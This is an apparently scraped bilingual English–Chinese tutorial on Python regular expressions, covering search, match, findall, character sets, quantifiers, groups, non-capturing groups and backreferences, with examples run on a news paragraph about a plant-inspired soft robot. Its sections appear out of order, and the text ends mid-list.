    ['Robots', 'are', 'branching', 'out.', 'A', 'new', 'prototype', 'soft', 'robot', 'takes', 'inspiration', 'from', 'plants', 'by', 'growing', 'to', 'explore', 'its', 'environment.', 'Vines', 'and', 'some', 'fungi', 'extend', 'from', 'their', 'tips', 'to', 'explore', 'their', 'surroundings.', 'Elliot', 'Hawkes', 'of', 'the', 'University', 'of', 'California', 'in', 'Santa', 'Barbara', 'and', 'his', 'colleagues', 'designed', 'a', 'bot', 'that', 'works', 'on', 'similar', 'principles.', 'Its', 'mechanical', 'body', 'sits', 'inside', 'a', 'plastic', 'tube', 'reel', 'that', 'extends', 'through', 'pressurized', 'inflation,', 'a', 'method', 'that', 'some', 'invertebrates', 'like', 'peanut', 'worms', '(Sipunculus', 'nudus)', 'also', 'use', 'to', 'extend', 'their', 'appendages.', 'The', 'plastic', 'tubing', 'has', 'two', 'compartments,', 'and', 'inflating', 'one', 'side', 'or', 'the', 'other', 'changes', 'the', 'extension', 'direction.', 'A', 'camera', 'sensor', 'at', 'the', 'tip', 'alerts', 'the', 'bot', 'when', 'it’s', 'about', 'to', 'run', 'into', 'something.', 'In', 'the', 'lab,', 'Hawkes', 'and', 'his', 'colleagues', 'programmed', 'the', 'robot', 'to', 'form', '3-D', 'structures', 'such', 'as', 'a', 'radio', 'antenna,', 'turn', 'off', 'a', 'valve,', 'navigate', 'a', 'maze,', 'swim', 'through', 'glue,', 'act', 'as', 'a', 'fire', 'extinguisher,', 'squeeze', 'through', 'tight', 'gaps,', 'shimmy', 'through', 'fly', 'paper', 'and', 'slither', 'across', 'a', 'bed', 'of', 'nails.', 'The', 'soft', 'bot', 'can', 'extend', 'up', 'to', '72', 'meters,', 'and', 'unlike', 'plants,', 'it', 'can', 'grow', 'at', 'a', 'speed', 'of', '10', 'meters', 'per', 'second,', 'the', 'team', 'reports', 'July', '19', 'in', 'Science', 'Robotics.', 'The', 'design', 'could', 'serve', 'as', 'a', 'model', 'for', 'building', 'robots', 'that', 'can', 'traverse', 'constrained', 'environments', 'This', 'isn’t', 'the', 'first', 'robot', 'to', 'take', 'inspiration', 'from', 'plants.', 'One', 'plantlike', 'predecessor', 'was', 'a', 'robot', 'modeled', 'on', 'roots.']
    ' '.join(re.findall('\S+', string))
    'Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment. Vines and some fungi extend from their tips to explore their surroundings. Elliot Hawkes of the University of California in Santa Barbara and his colleagues designed a bot that works on similar principles. Its mechanical body sits inside a plastic tube reel that extends through pressurized inflation, a method that some invertebrates like peanut worms (Sipunculus nudus) also use to extend their appendages. The plastic tubing has two compartments, and inflating one side or the other changes the extension direction. A camera sensor at the tip alerts the bot when it’s about to run into something. In the lab, Hawkes and his colleagues programmed the robot to form 3-D structures such as a radio antenna, turn off a valve, navigate a maze, swim through glue, act as a fire extinguisher, squeeze through tight gaps, shimmy through fly paper and slither across a bed of nails. The soft bot can extend up to 72meters, and unlike plants, it can grow at a speed of 10meters per second, the team reports July 19 in Science Robotics. The design could serve as a model for building robots that can traverse constrained environments This isn’t the first robot to take inspiration from plants. One plantlike predecessor was a robot modeled on roots.'

    . the dot matches any character excerpt the newline. 点匹配除换行符以外的任何字符。

    string = '''Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.

    Vines and some fungi extend from their tips to explore their surroundings. Elliot Hawkes of the University of California in Santa Barbara and his colleagues designed a bot that works on similar principles. Its mechanical body sits inside a plastic tube reel that extends through pressurized inflation, a method that some invertebrates like peanut worms (Sipunculus nudus) also use to extend their appendages. The plastic tubing has two compartments, and inflating one side or the other changes the extension direction. A camera sensor at the tip alerts the bot when it’s about to run into something.

    In the lab, Hawkes and his colleagues programmed the robot to form 3-D structures such as a radio antenna, turn off a valve, navigate a maze, swim through glue, act as a fire extinguisher, squeeze through tight gaps, shimmy through fly paper and slither across a bed of nails. The soft bot can extend up to 72meters, and unlike plants, it can grow at a speed of 10meters per second, the team reports July 19 in Science Robotics. The design could serve as a model for building robots that can traverse constrained environments

    This isn’t the first robot to take inspiration from plants. One plantlike predecessor was a robot modeled on roots.'''
    re.search('.+', string).group()  # no new line
    'Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.'
    re.search('.+', string, flags = re.DOTALL).group()
    'Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.\n\nVines and some fungi extend from their tips to explore their surroundings. Elliot Hawkes of the University of California in Santa Barbara and his colleagues designed a bot that works on similar principles. Its mechanical body sits inside a plastic tube reel that extends through pressurized inflation, a method that some invertebrates like peanut worms (Sipunculus nudus) also use to extend their appendages. The plastic tubing has two compartments, and inflating one side or the other changes the extension direction. A camera sensor at the tip alerts the bot when it’s about to run into something.\n\nIn the lab, Hawkes and his colleagues programmed the robot to form 3-D structures such as a radio antenna, turn off a valve, navigate a maze, swim through glue, act as a fire extinguisher, squeeze through tight gaps, shimmy through fly paper and slither across a bed of nails. The soft bot can extend up to 72meters, and unlike plants, it can grow at a speed of 10meters per second, the team reports July 19 in Science Robotics. The design could serve as a model for building robots that can traverse constrained environments\n\nThis isn’t the first robot to take inspiration from plants. One plantlike predecessor was a robot modeled on roots.'

    Creating your own character sets

    [A-Z] '-' is a metacharacter when used in [] (custom character sets) '-'[](自定义字符集)中使用时是一个元字符

    string = 'Hello, There, How, Are, You'
    re.findall('[A-Z]', string)  # pulls out all capital letters 取出所有大写字母
    ['H', 'T', 'H', 'A', 'Y']
    re.findall('[A-Z,]', string)
    # here we search for any capital letters or a comma
    # 这里我们搜索大写字母或逗号
    ['H', ',', 'T', ',', 'H', ',', 'A', ',', 'Y']
    string = 'Hello, There, How, Are, You...'
    re.findall('[A-Z,.]', string) # 在这里 . 只是一个字符集而不是之前所讲的所有非换行符
    ['H', ',', 'T', ',', 'H', ',', 'A', ',', 'Y', '.', '.', '.']
    string = 'Hello, There, How, Are, You...'
    re.findall('[A-Za-z,\s.]', string) # 大写字母, 小写字母, 逗号, 非空白, 句点
    ['H', 'e', 'l', 'l', 'o', ',', ' ', 'T', 'h', 'e', 'r', 'e', ',', ' ', 'H', 'o', 'w', ',', ' ', 'A', 'r', 'e', ',', ' ', 'Y', 'o', 'u', '.', '.', '.']

    Quantifers with custom sets

    import re
    • + 出现一次或更多
    • ? 出现 0 或 1 次
    • * 出现 0 次或更多
    • {} 自定义出现次数
    string = 'HELLO, There, How, Are, You...'
    re.search('[A-Z]+', string)
    <re.Match object; span=(0, 5), match='HELLO'>
    re.findall('[A-Z]+', string)
    ['HELLO', 'T', 'H', 'A', 'Y']
    re.findall('[A-Z]{2,}', string)  # 2 or more
    ['HELLO']
    # one or more of 4 types of characters
    # 四种字符中的一种或多种
    re.search('[A-Za-z\s,]+', string).group()
    'HELLO, There, How, Are, You'
    re.findall('[A-Z]?[a-z\s,]+', string)
    ['O, ', 'There, ', 'How, ', 'Are, ', 'You']
    # ^ is a metacharacter within brackets
    # ^是括号中的元字符
    # 表示相反
    re.search('[^A-Za-z\s,]+', string).group()
    '...'
    re.findall('[^A-Z]+', string) # 匹配所有非大写字符
    [', ', 'here, ', 'ow, ', 're, ', 'ou...']

    GROUPS

    • groups allow us to pull out sections of a match and store them
      • groups 允许我们提取匹配的部分并存储它们
    # contrived example 举例
    import re
    string = 'John has 6 cats but I think my friend Susan has 3 dogs and Mike has 8 fishes'
    re.findall('[A-Za-z]+ \w+ \d+ \w+', string)
    ['John has 6 cats', 'Susan has 3 dogs', 'Mike has 8 fishes']
    • the use of brackets denotes a group 使用括号表示一个组
      • () = metacharacter 元字符
    re.findall('([A-Za-z]+) \w+ \d+ \w+', string) # to pull out just the names 只把名字取出来
    ['John', 'Susan', 'Mike']
    re.findall('[A-Za-z]+ \w+ \d+ (\w+)', string) # pull out animals 取出所有动物
    ['cats', 'dogs', 'fishes']
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    # use original string to make sure matching is correct, then use groups to pull out the info you want
    # 使用原始字符串确保匹配是正确的,然后使用组拉出你想要的信息
    [('John', '6', 'cats'), ('Susan', '3', 'dogs'), ('Mike', '8', 'fishes')]
    # organize the data by data-types 按数据类型组织数据
    info = re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    info
    [('John', '6', 'cats'), ('Susan', '3', 'dogs'), ('Mike', '8', 'fishes')]

    Python3 zip() 函数

    • zip() 函数用于将可迭代的对象作为参数,将对象中对应的元素打包成一个个元组,然后返回由这些元组组成的对象,这样做的好处是节约了不少的内存。
    • 与 zip 相反,zip(*) 可理解为解压,返回二维矩阵式
    list(zip(*info))  # organize your data by categories 按类别组织数据
    [('John', 'Susan', 'Mike'), ('6', '3', '8'), ('cats', 'dogs', 'fishes')]
    match = re.search('([A-Za-z]+) \w+ (\d+) (\w+)', string)  # pulls out three groups 抽出三组
    match
    <re.Match object; span=(0, 15), match='John has 6 cats'>
    match.group(0)
    'John has 6 cats'
    match.groups()
    ('John', '6', 'cats')
    match.group(1)
    'John'
    match.group(2)
    '6'
    match.group(3)
    'cats'
    match.group(1, 3)  # multiple groups 多个组
    ('John', 'cats')
    match.group(3, 2, 1, 1)  # change the order 改变顺序
    ('cats', '6', 'John', 'John')
    match.span()
    (0, 15)
    match.span(2)
    (9, 10)
    match.span(3)
    (11, 15)
    match.start(3)
    11
    # find all has no group function
    # re.findall 没有 group 函数
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string).group(1)
    ---------------------------------------------------------------------------AttributeError                            Traceback (most recent call last)Input In [101], in <cell line: 3>()      1 # find all has no group function      2 # re.findall 没有 group 函数----> 3 re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string).group(1)AttributeError: 'list' object has no attribute 'group'
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)[0]
    ('John', '6', 'cats')
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)[0].group(1)  # 这也不好使
    ---------------------------------------------------------------------------AttributeError                            Traceback (most recent call last)Input In [39], in <cell line: 1>()----> 1 re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)[0].group(1)AttributeError: 'tuple' object has no attribute 'group'
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    [('John', '6', 'cats'), ('Susan', '3', 'dogs'), ('Mike', '8', 'fishes')]
    data = re.findall('(([A-Za-z]+) \w+ (\d+) (\w+))', string)  # 组中组
    data
    [('John has 6 cats', 'John', '6', 'cats'), ('Susan has 3 dogs', 'Susan', '3', 'dogs'), ('Mike has 8 fishes', 'Mike', '8', 'fishes')]
    # 你只能这么干
    for i in data:
    print(i[3])
    catsdogsfishes
    it = re.finditer('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    next(it).groups()
    ('John', '6', 'cats')
    it = re.finditer('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    for element in it:
    print (element.group(1, 3, 2)) # don't forget iterators exhaust
    ('John', 'cats', '6')('Susan', 'dogs', '3')('Mike', 'fishes', '8')
    it = re.finditer('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    for element in it:
    print(element.group())
    John has 6 catsSusan has 3 dogsMike has 8 fishes
    it = re.finditer('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    for element in it:
    print(element.groups())
    ('John', '6', 'cats')('Susan', '3', 'dogs')('Mike', '8', 'fishes')

    Naming Groups

    import re
    string = 'New York, New York 11369'
    • ([A-Za-z\s]+) 寄件地址
    • ([A-Za-z\s]+) 收件地址
    • (\d+) 邮编
    match = re.search('([A-Za-z\s]+),([A-Za-z\s]+)(\d+)', string)
    match.group(1), match.group(2), match.group(3), match.group(0)
    ('New York', ' New York ', '11369', 'New York, New York 11369')

    ?P< > to name a group-- group name inside the <>, followed by RE for group

    • (?P<City>)
    • (?P<State>)
    • (?P<ZipCode>)
    pattern = re.compile('(?P<City>[A-Za-z\s]+),(?P<State>[A-Za-z\s]+)(?P<ZipCode>\d+)')
    match = re.search(pattern, string)
    match.group('City'), match.group('State'), match.group('ZipCode')
    ('New York', ' New York ', '11369')
    match.group(1)
    'New York'
    match.groups()
    ('New York', ' New York ', '11369')
    # Just incase you forget the names of the groups you used
    # 以防您忘记了您使用的组的名称
    match.groupdict()
    {'City': 'New York', 'State': ' New York ', 'ZipCode': '11369'}

    Quantifiers on groups

    • Using quantifiers on groups has some nuances, but very useful
      • 在组上使用量词有一些细微差别,但非常有用
    import re
    string = 'abababababab'  # ab repeated many times
    re.search('(ab)+', string) #(ab)+ is many instances of one group repeated 同一组的许多实例重复出现
    <re.Match object; span=(0, 12), match='abababababab'>
    string = 'abababababab'  # ab repeated many times 重复了很多次

    re.search('[ab]+', string) # this is different
    <re.Match object; span=(0, 12), match='abababababab'>
    • difference explained below
      • (ab) 表示 a 和 b
      • [ab] 表示 a 或 b
    string = 'abababbbbbbb'  # only partial fit to our new string 只有部分符合我们的新字符串
    re.search('(ab)+', string)
    <re.Match object; span=(0, 6), match='ababab'>
    string = 'abababbbbbbb'  # but this pattern fits perfectly 但这个模式完全吻合
    re.search('[ab]+', string)
    <re.Match object; span=(0, 12), match='abababbbbbbb'>
    string = 'abababbbbbbb'  # allows flexibility 允许的灵活性
    re.search('(ab)+\w+', string)
    <re.Match object; span=(0, 12), match='abababbbbbbb'>
    string = 'abababsssss'  # allows flexibility
    re.search('(ab)+\w+', string)
    <re.Match object; span=(0, 11), match='abababsssss'>

    Nuances to be wary of

    需要注意的细微差别

    # only one group not multiple groups 只有一个组而不是多个组
    string = 'abababababab' # original string
    match = re.search('(ab)+', string)

    match.group(1)
    # capturing only one group; value is overwritten each time
    # 只捕获一个群体; 值每次都会被覆盖
    'ab'
    match.group(2) # no value 没有值
    ---------------------------------------------------------------------------IndexError                                Traceback (most recent call last)Input In [10], in <cell line: 1>()----> 1match.group(2)IndexError: no such group
    match.groups()  # only one group, group just overwritten 只有一个组,组被覆盖了
    ('ab',)
    match.group(0) # the full match, not related to groups 完全匹配,与组无关
    'abababababab'
    • Another simple example with two groups using quantifiers
      • 另一个使用量词的两个组的简单例子
    string = 'ababababab'
    match = re.search ('(ab)+(ab)+', string)
    match
    <re.Match object; span=(0, 10), match='ababababab'>
    match.groups()
    ('ab', 'ab')
    match.span(2) # the first group is greedy
    (8, 10)
    • Only one group captured
      • 只捕获了一个群体
    string = '123456789'

    match = re.search('(\d)+', string)
    match
    <re.Match object; span=(0, 9), match='123456789'>
    (match.groups())  # only one group, and it uses the last value 只有一个组,它使用最后一个值
    ('9',)

    Quantifiers with groups within findall

    在 findall 中包含组的量词

    string = '123456789'

    re.findall('(\d)+', string)
    # only pulls out group and last instance
    # 只取出组和最后一个实例
    ['9']
    string = '1234 56789'
    re.findall('(\d)+', string)
    # Here we have two matches 匹配了两个
    ['4', '9']
    re.findall('((\d)+)', string)[1][0] 
    # to find full match create a main group engulfing the smaller groups
    # 要找到完全匹配,创建一个主组,吞噬较小的组
    '56789'
    # another example
    string = 'abbbbb ababababab'
    re.findall('(ab)+', string) # two instances
    ['ab', 'ab']
    string  = 'abbbbb ababababab'
    re.findall('((ab)+)', string) #full match
    [('ab', 'ab'), ('ababababab', 'ab')]

    Groups for word completion

    re.search('Happy (Valentines|Birthday|Anniversary)', 'Happy Birthday')
    <re.Match object; span=(0, 14), match='Happy Birthday'>
    re.search('Happy (Valentines|Birthday|Anniversary)', 'Happy Valentines')
    <re.Match object; span=(0, 16), match='Happy Valentines'>
    re.search('Happy Valentines| Happy Birthday | Happy Anniversary', 'Happy Valentines')
    <re.Match object; span=(0, 16), match='Happy Valentines'>

    Non-capture Groups

    import re
    # Here is one such example:
    import re

    string = '1234 56789'
    re.findall('(\d)+', string)
    ['4', '9']
    re.search('(\d)+', string).groups()  #using search
    ('4',)

    捕获组(capturing group)是把多个字符当作一个单元对待的一种方式。通过把字符括在括号内创建捕获组。例如,正则表达式(dog)创建包含字母“d”、“o”和“g”的一个组。输入字符串和捕获组匹配的那一部分将被保存在内存中,以便以后通过反向引用再次使用。

    非捕获组就是输入字符串和捕获组匹配的那一部分将不被保存在内存中。

    • non-capture groups syntax
      • ?: The symbol above represents non-capture groups and looks slightly similar to the syntax for naming groups
        • 上面的符号表示非捕获组,看起来有点类似于命名组的语法
      • ?P don’t confuse the two please.
        • 请不要混淆这两者
    # comparison 比较
    re.findall('(\d)+', string)
    ['4', '9']
    re.findall('(?:\d)+', string)  # with non capture group 非捕获组
    ['1234', '56789']
    • So the group is part of the pattern, but we don’t output the groups’ results
      • 所以 group 是模式的一部分,但我们不输出 group 的结果
    re.findall('\d+', string)
    # when RE has no groups in findall, we output entire match
    # 当 RE 在 findall 中没有组时,我们输出整个匹配
    ['1234', '56789']
    # Another example
    string  = '123123 = Alex, 123123123 = Danny, 123123123123 = Mike, 456456 = rick, 121212 = John, 132132 = Luis,' 
    # We want to pull out all names whose ID has 123 within in
    # 我们要取出所有 ID 包含 123 的名字
    re.findall('(?:123)+ = (\w+),', string)  # three instances
    ['Alex', 'Danny', 'Mike']
    # Another example
    string = '1*1*1*1*22222 1*1*3333 2*1*2*1*222 1*2*2*2*333 3*3*3*444'
    re.findall('(?:1\*){2,}\d+', string)
    ['1*1*1*1*22222', '1*1*3333']
    • Now, non-captured groups doesn’t just affect the findall method
    • it also affects the search and match methods
      • 现在,未捕获的组不仅影响 findall 方法——它还影响搜索和匹配方法

    BE CAREFUL WITH SYNTAX

    • ?: correct!
    • :? incorrect!
    string = '1234 56789'
    match = re.search('(?:\d)+', string) # correct syntax
    print(match.groups())
    ()
    string = '1234 56789'
    match = re.search('(:?\d)+', string) # :? incorrect syntax!!!!
    print(match.groups())
    ('4',)

    Summary:

    • when we capture groups we are either storing the value or outputting them.
      • 当我们捕获组时,我们要么存储值,要么输出值。

    Backreferences - Using captured groups inside other operations

    反向引用——在其他操作中使用捕获的组

    • backreferencing is making a refererence to the captured group within the same regular expression
      • 反向引用是在同一个正则表达式中引用捕获的组
    # syntax and example
    re.search(r'(\w+) \1','Merry Merry Christmas')  # Looking for repeated words 寻找重复的单词
    <re.Match object; span=(0, 11), match='Merry Merry'>
    re.search(r'(\w+) \1','Merry Merry Christmas').groups()
    ('Merry',)

    \1 is just referencing the first group within the regular expression

    ‘\1’ 匹配的是 所获取的第 1 个()匹配的引用。例如,’(\d)\1’ 匹配两个连续数字字符。如 33aa 中的 33

    # Another example
    re.findall(r'(\w+)','Happy Happy Holidays. Merry Christmas Christmas')
    ['Happy', 'Happy', 'Holidays', 'Merry', 'Christmas', 'Christmas']
    re.findall(r'(\w+) \1','Happy Happy Holidays. Merry Christmas Christmas')   # Want to look for repeated words 想要寻找重复的单词
    ['Happy', 'Christmas']
    # another example
    re.findall(r'(\w+) \1','Merry Merry Christmas Christmas Merry Merry Christmas')
    ['Merry', 'Christmas', 'Merry']
    ]]>
    + 资源
    • Python Regular Expressions - part #1 - YouTube

    • Regular Expressions are used to match string patterns. 正则表达式用于匹配字符串模式。

      • They are very powerful 它们非常强大

      • If you want to pull out a string pattern RE can do it 如果你想拉出一个字符串模式正则可以做到

      • They may seem intimidating 他们可能看起来很吓人

    课程

    Things to note

    • The first thing I want start off with is the the back slash character

      • 我想要开始的第一件事是反斜杠字符
    • Very confusing to people

      • 很让人困惑
    • Python uses back slash to indicate special characters

      • Python 使用反斜杠表示特殊字符
    • '\n' Backslash followed by n denotes a newline

      • 反斜杠后面加 n 表示换行符
    • '\t' denotes a tab

      • ‘\t’ 表示制表符
    • 'r' expression, that voids the Python’s special characters

      • 'r’表达式,将使 Python 的特殊字符无效
    • r'\n' means it’s a raw string with two characters ‘n’ and ‘' as opposed to just one special character’

      • r’\n’表示它是一个有两个字符’n’和’'的原始字符串而不是只有一个特殊字符’
    • Let’s see some examples of this dont mind the python syntax

      • 让我们看一些这样的例子,不要介意 python 语法

    python 正则表达式 re.search()怎么使用?

    re.search(pattern, string, flags =0)

    1
    2
    import re
    re.search('n', '\n') # first item is pattern, second item is string
    1
    2
    3
    # two ways to handle this one way is to use \ for every backslash
    # 有两种处理方法,一种方法是对每个反斜杠使用\ (另一种是在前面加 r)
    re.search('n', '\\n')
    <re.Match object; span=(1, 2), match='n'>
    1
    2
    3
    # not the best way if we have too many \s
    # 如果我们有太多的\,这不是最好的方法
    re.search('n', '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n')
    1
    2
    3
    # r converts to raw string
    # r 转换为原始字符串
    re.search('n', r'\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n')
    <re.Match object; span=(1, 2), match='n'>
    1
    2
    3
    4
    5
    6
    7
    8
    """
    there are some nuances that you should be aware of regular expressions
    has its own special characters as well regex with '\n' and r'\n' both
    look for newline.
    你应该注意到一些细微的差别,正则表达式也有自己的特殊字符,
    带有'\n'和 r'\n'的正则表达式都查找换行符
    """
    re.search('\n', '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n')
    <re.Match object; span=(0, 1), match='\n'>
    1
    2
    3
    # this works as well because r'\n' also looks for new line
    # 同样有效,因为 pattern 中 r'\n' 也会查找新行
    re.search(r'\n', '\n\n')
    <re.Match object; span=(0, 1), match='\n'>
    1
    2
    3
    # doesn't work because string doesn't use newline and r'\n' looks for newline
    # 不能工作,因为 string 不使用换行符,而 pattern 中 r'\n'查找换行符
    re.search(r'\n', r'\n\n')

    MATCH and SEARCH EXAMPLES

    REs common methods - Match and Search

    • searches anywhere in the sentence 搜索句子中的任何位置
    • flags: special options 标志:特殊选项

    re.search(pattern, string, flags)

    • only beginning of the string 只搜索字符串的开始

    re.match(pattern, string, flags)

    1
    2
    3
    # returns none because only looks at the start of string
    # 返回 none,因为只查看字符串的开头
    re.match("c", "abcdef")
    1
    re.search("c", "abcdef")  # searches anywhere
    <re.Match object; span=(2, 3), match='c'>
    1
    bool(re.match("c", "abcdef"))  # no match returns boolean false
    False
    1
    bool(re.match("a", "abcdef"))  # match returns true
    True
    1
    2
    3
    # tells you where it matched first and only first
    # 告诉你它首先匹配的位置
    re.search("c", "abcdef")
    <re.Match object; span=(2, 3), match='c'>
    1
    re.search("c", "abcdefc")  # multiple 'c's first instance only 返回多个 c 的第一个实例
    <re.Match object; span=(2, 3), match='c'>
    1
    re.search("c", "abdef\nc")  # multiline works with search 多行与搜索一起工作
    <re.Match object; span=(6, 7), match='c'>
    1
    re.match("c", "\nc")  # match doesn't work with newline 匹配对换行符无效
    1
    (re.match("a", "abcdef"))  # match objects
    <re.Match object; span=(0, 1), match='a'>

    python 正则匹配中 re.match().group(num=0)

    1
    re.match("a", "abcdef").group()  # string output # defautlt value is 0 默认值为 0 
    'a'
    1
    re.match("a", "abcdef").group(0)  
    'a'
    1
    re.search("n", "abcdefnc abcd").group()
    'n'
    1
    2
    re.search('n.+', "abcdefnc abcd").group()  # pull out different types of strings 拿出不同类型的字符串
    # depending on the wildcards you use 这取决于您使用的通配符
    'nc abcd'

    python 正则(2)group/start/end/span 方法

    1
    re.search("c", "abdef\nc").start()
    6
    1
    re.search("c", "abdef\nc").end()
    7

    Literal matching

    1
    re.search('na',"abcdefnc abcd" )  # doesn't work, because they are ordered 无效,因为它们是有序的
    1
    re.search('n|a',"abcdefnc abcda" )  # n or a
    <re.Match object; span=(0, 1), match='a'>
    1
    re.search('n|a',"bcdefnc abcda" )  # replaced the a with b, first match is an n
    <re.Match object; span=(5, 6), match='n'>
    1
    re.search('n|a|b',"bcdefnc abcda" ) # as many OR expressions
    <re.Match object; span=(0, 1), match='b'>

    re.findall

    1
    re.findall('n|a',"bcdefnc abcda" ) # find all pulls out all instances 取出所有实例
    ['n', 'a', 'a']
    1
    re.search('abcd',"abcdefnc abcd" ) # multiple characters - literal search 多字符-文字搜索
    <re.Match object; span=(0, 4), match='abcd'>
    1
    re.findall('abcd',"abcdefnc abcd" ) 
    ['abcd', 'abcd']

    CHARACTER SETS

    • Character sets can match a set of characters
      • 简化正则表达式
    1
    2
    import re
    re.search('abcd',"abcdefnc abcd" ) # earlier code 之前的代码
    <re.Match object; span=(0, 4), match='abcd'>
    1
    2
    re.search(r'\w\w\w\w',"abcdefnc abcd" )  # matches characters and numbers 匹配字符和数字
    # alpha numeric characters
    <re.Match object; span=(0, 4), match='abcd'>

    \w matches alpha numeric characters [a-zA-Z0-9_]

    1
    re.search(r'\w\w\w\w',"ab_cdefnc abcd" )  # matches _ character 匹配_字符
    <re.Match object; span=(0, 4), match='ab_c'>
    1
    re.search(r'\w\w\w', "a3.!-!")  # doesn't match symbols only numbers and characters 不匹配符号,只匹配数字和字符
    1
    re.search(r'\w\w\w', "a33-_!") .group()
    'a33'

    \W opposite of \w ;

    so nothing included in [a-zA-Z0-9_]

    1
    2
    re.search(r'\w\w\W', "a3.-_!")  # \W matches non characters and numbers
    # \W 匹配非字符和数字
    <re.Match object; span=(0, 3), match='a3.'>
    1
    2
    re.search(r'\w\w\W', "a3 .-_!")  # matches empty space as well 
    # \W 也可以匹配空格
    <re.Match object; span=(0, 3), match='a3 '>

    We will go over other character sets later on

    Let’s go over quantifiers’

    • quantifiers
      • '+' = 1 or more
      • '?' = 0 or 1
      • '*' = 0 or more
      • '{n,m}' = n to m repetitions {,3}, {3,}
    1
    re.search(r'\w\w',"abcdefnc abcd" )
    <re.Match object; span=(0, 2), match='ab'>
    1
    re.search(r'\w+',"abcdefnc abcd" ).group()  # don't know the numbers of letters 不知道单词的字母个数
    'abcdefnc'
    1
    re.search(r'\w+\W+\w+',"abcdefnc abcd").group()
    'abcdefnc abcd'
    1
    re.search('\w+\W+\w+',"abcdefnc       abcd").group()  # added spaces
    'abcdefnc       abcd'
    1
    re.search(r'\w+\W?\w+',"abcdefnabcd").group()  # ? = 0 or 1 instances
    'abcdefnabcd'
    1
    re.search(r'\w+\W?\w+',"abcde fnabcd").group()
    'abcde fnabcd'
    1
    re.search(r'\w+\W+\w+', "abcdefnabcd")
    • Pulling out specific amounts
      • 取出特定数量
    1
    re.search(r'\w{3}', 'aaaaaaaaaaa')  # only 3 \w characters
    <re.Match object; span=(0, 3), match='aaa'>
    1
    re.search(r'\w{1,4}', 'aaaaaaaaaaa').group()  #1 is min, 4 is max
    'aaaa'
    1
    2
    3
    4
    re.search(r'\w{1,10}\W{0,4}\w+',"abcdefnc abcd").group()
    # 1-10 \w characters,
    # 0-4 \W chracters,
    # 1+ \w characters
    'abcdefnc abcd'
    1
    re.search(r'\w{1,}\W{0,}\w+',"abcdefnc abcd").group() #at least 1, at least 0, 1+
    'abcdefnc abcd'

    Other types of characters sets

    '\d' = matches digits [0-9]

    '\D' = matches This matches any non-digit character; ~\d

    1
    2
    3
    import re
    string = '23abced++'
    re.search('\d+', string).group()
    '23'

    '\s' = matches any whitespace character, new lines, tabs, spaces etc 匹配任何空白字符,新行,制表符,空格等

    '\S' = matches any non-whitespace chracter : ~\s 匹配任何非空格字符:~\s

    1
    2
    string = '23abced++'
    re.search('\S+', string).group() # no spaces
    '23abced++'
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    string = '''Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.

    Vines and some fungi extend from their tips to explore their surroundings.
    Elliot Hawkes of the University of California in Santa Barbara
    and his colleagues designed a bot that works
    on similar principles. Its mechanical body
    sits inside a plastic tube reel that extends
    through pressurized inflation, a method that some
    invertebrates like peanut worms (Sipunculus nudus)
    also use to extend their appendages. The plastic
    tubing has two compartments, and inflating one
    side or the other changes the extension direction.
    A camera sensor at the tip alerts the bot when it’s
    about to run into something.

    In the lab, Hawkes and his colleagues
    programmed the robot to form 3-D structures such
    as a radio antenna, turn off a valve, navigate a maze,
    swim through glue, act as a fire extinguisher, squeeze
    through tight gaps, shimmy through fly paper and slither
    across a bed of nails. The soft bot can extend up to
    72meters, and unlike plants, it can grow at a speed of
    10meters per second, the team reports July 19 in Science Robotics.
    The design could serve as a model for building robots
    that can traverse constrained environments

    This isn’t the first robot to take
    inspiration from plants. One plantlike
    predecessor was a robot modeled on roots.'''
    1
    (re.findall('\S+', string))  # 返回 string 中所有的单词
    ['Robots', 'are', 'branching', 'out.', 'A', 'new', 'prototype', 'soft', 'robot', 'takes', 'inspiration', 'from', 'plants', 'by', 'growing', 'to', 'explore', 'its', 'environment.', 'Vines', 'and', 'some', 'fungi', 'extend', 'from', 'their', 'tips', 'to', 'explore', 'their', 'surroundings.', 'Elliot', 'Hawkes', 'of', 'the', 'University', 'of', 'California', 'in', 'Santa', 'Barbara', 'and', 'his', 'colleagues', 'designed', 'a', 'bot', 'that', 'works', 'on', 'similar', 'principles.', 'Its', 'mechanical', 'body', 'sits', 'inside', 'a', 'plastic', 'tube', 'reel', 'that', 'extends', 'through', 'pressurized', 'inflation,', 'a', 'method', 'that', 'some', 'invertebrates', 'like', 'peanut', 'worms', '(Sipunculus', 'nudus)', 'also', 'use', 'to', 'extend', 'their', 'appendages.', 'The', 'plastic', 'tubing', 'has', 'two', 'compartments,', 'and', 'inflating', 'one', 'side', 'or', 'the', 'other', 'changes', 'the', 'extension', 'direction.', 'A', 'camera', 'sensor', 'at', 'the', 'tip', 'alerts', 'the', 'bot', 'when', 'it’s', 'about', 'to', 'run', 'into', 'something.', 'In', 'the', 'lab,', 'Hawkes', 'and', 'his', 'colleagues', 'programmed', 'the', 'robot', 'to', 'form', '3-D', 'structures', 'such', 'as', 'a', 'radio', 'antenna,', 'turn', 'off', 'a', 'valve,', 'navigate', 'a', 'maze,', 'swim', 'through', 'glue,', 'act', 'as', 'a', 'fire', 'extinguisher,', 'squeeze', 'through', 'tight', 'gaps,', 'shimmy', 'through', 'fly', 'paper', 'and', 'slither', 'across', 'a', 'bed', 'of', 'nails.', 'The', 'soft', 'bot', 'can', 'extend', 'up', 'to', '72', 'meters,', 'and', 'unlike', 